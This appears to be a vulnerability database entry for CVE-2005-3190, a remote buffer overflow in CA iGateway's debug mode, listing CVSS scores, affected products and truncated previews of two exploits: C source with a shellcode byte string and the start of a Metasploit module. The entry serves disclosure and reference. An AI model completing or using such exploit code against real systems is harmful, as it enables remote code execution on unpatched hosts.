7.5
CVSSv2

CVE-2005-3190

Published: 13/10/2005 Updated: 09/04/2021
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 760
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Buffer overflow in Computer Associates (CA) iGateway 3.0 and 4.0 prior to 4.0.050623, when running in debug mode, allows remote malicious users to execute arbitrary code via HTTP GET requests.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

broadcom igateway 3.0

broadcom igateway 4.0

Exploits

/*ca igateway debug remote overflow -egm erikam@gmailcom*/ /*013005*/ #include <stdioh> #include <winsock2h> #include <errnoh> #include <windowsh> const int MAXSIZE = 17110; char sc[] = //metasploit "\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3d\x19\x6d" "\xf7\x83\xeb\xfc\xe2\xf4\xc1\x73\x86\xba\xd5\xe0\x ...
## # $Id: ca_igateway_debugrb 9179 2010-04-30 08:40:19Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## class Metasploit3 < M ...